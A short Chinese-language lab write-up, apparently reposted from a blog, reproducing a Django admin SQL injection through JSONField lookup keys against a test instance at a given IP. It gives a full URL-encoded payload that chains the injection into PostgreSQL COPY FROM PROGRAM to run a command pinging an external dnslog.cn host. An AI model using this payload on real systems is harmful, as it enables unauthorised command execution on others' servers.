Django SQL注入漏洞

Django SQL注入漏洞,第1张

1.访问http://110.40.154.100:8000,可以看到Django的默认页面

2.访问http://110.40.154.100:8000/admin进入登录界面  输入账号密码进行登录

3.进入Collection的管理页面http://110.40.154.100:8000/admin/vuln/collection/

 

 4.GET参数中构造detail__a'b=123提交,其中detail是模型Collection中的JSONField:http://110.40.154.100:8000/admin/vuln/collection/?detail__a%27b=123

 5.然后执行命令http://110.40.154.100:8000/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping%208e5p35.dnslog.cn%27--%20

 

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/langs/917157.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-16
下一篇 2022-05-16

发表评论

登录后才能评论

评论列表(0条)

保存